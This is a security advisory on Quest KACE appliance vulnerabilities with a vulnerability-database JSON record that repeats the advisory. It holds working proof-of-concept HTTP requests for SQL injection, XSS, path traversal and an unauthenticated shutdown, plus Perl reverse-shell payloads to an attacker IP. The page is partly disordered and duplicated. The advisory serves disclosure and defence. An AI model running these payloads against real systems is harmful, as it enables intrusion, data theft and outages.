/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0595",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11135"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11135",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11135",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"id": "CNVD-2018-15641",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11135",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11135",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-15641",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1219",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The script \u0027/adminui/error_details.php\u0027 in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks. Quest KACE Systems Management Appliance Contains a code injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. The \\342\\200\\230/adminui/error_details.php\\342\\200\\231 script in QuestKACESystemManagementAppliance 8.0.318 has a PHP object injection vulnerability. An attacker can exploit this vulnerability to inject a PHP object and execute arbitrary commands. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 